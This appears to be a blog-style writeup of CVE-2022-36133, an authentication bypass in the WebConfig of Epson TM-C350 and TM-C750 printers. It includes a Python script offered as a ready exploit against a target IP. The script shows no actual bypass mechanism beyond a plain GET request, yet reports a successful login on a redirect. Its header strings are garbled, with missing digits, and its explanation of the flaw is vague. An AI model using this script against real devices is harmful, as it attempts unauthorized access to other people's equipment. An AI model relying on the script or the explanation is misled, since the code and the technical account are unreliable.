CVE-2022-36133 - Authentication Bypass Vulnerability in Epson TM-C350 and TM-C750 WebConfig Functionality

Introduction:
A new vulnerability, identified as CVE-2022-36133, has been discovered in the WebConfig functionality of Epson TM-C350 and TM-C750 devices with firmware version WAM31500. This vulnerability allows attackers to bypass the authentication process and gain unauthorized access to the device's settings, putting the device's security and potentially sensitive data at risk. In this post, we will explore the details of the vulnerability, possible exploitation methods, and the relevant code snippets that demonstrate the issue. Furthermore, external resources, including links to original references, will be provided to gain deeper understanding into the matter.

Exploit Details

The authentication bypass vulnerability in the WebConfig functionality of the targeted Epson devices stems from a weak implementation of the login process. Specifically, the WebConfig service does not require a valid username and password when the user attempts to log in. Instead, it allows an attacker to bypass the necessary credentials by manipulating the session cookies or sending a crafted HTTP request to the service.

To exploit this vulnerability, an attacker can craft a malicious HTTP request and send it to the targeted device's WebConfig service to establish an unauthorized session. Once the session is established, the attacker has full access to the device settings, potentially causing further harm by changing sensitive information or causing denial of service.

Code Snippet

Below is a sample Python script that can be used to exploit this vulnerability on a target Epson TM-C350 or TM-C750 device, running firmware version WAM31500.

import requests

target_ip = '192.168.1.100'   # Replace with target device's IP address
exploit_url = f'http://{target_ip}/webconfig/';

headers = {
    'User-Agent': 'Mozilla/5. (Windows NT 10.; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88..4324.182 Safari/537.36',
    'Accept': '*/*',
    'Referer': f'{exploit_url}',
    'Accept-Encoding': 'gzip, deflate',
}

response = requests.get(exploit_url, headers=headers, allow_redirects=False)

if response.status_code == 302 and 'Location' in response.headers and response.headers['Location'] == f'{exploit_url}index.html':
    print('[+] Exploit successful! You are now logged in.')
    print(f'Visit {exploit_url} to access the device settings.')
else:
    print('[-] Exploit failed. Target device might not be vulnerable or has already been patched.')

Original References

For more information regarding this vulnerability and its implications, please refer to the following resources:

1. MITRE's CVE Listing for CVE-2022-36133
2. National Vulnerability Database (NVD) - CVE-2022-36133

Conclusion

The CVE-2022-36133 vulnerability, as explained above, allows unauthorized access to Epson TM-C350 and TM-C750 devices running firmware version WAM31500. Attackers can exploit this vulnerability to bypass authentication processes using a crafted HTTP request. Therefore, it is crucial for affected device owners to apply any available security patches from the device manufacturer to mitigate the potential risk of unauthorized access and manipulation of device settings.

Timeline

Published on: 11/25/2022 06:15:00 UTC
Last modified on: 11/30/2022 20:49:00 UTC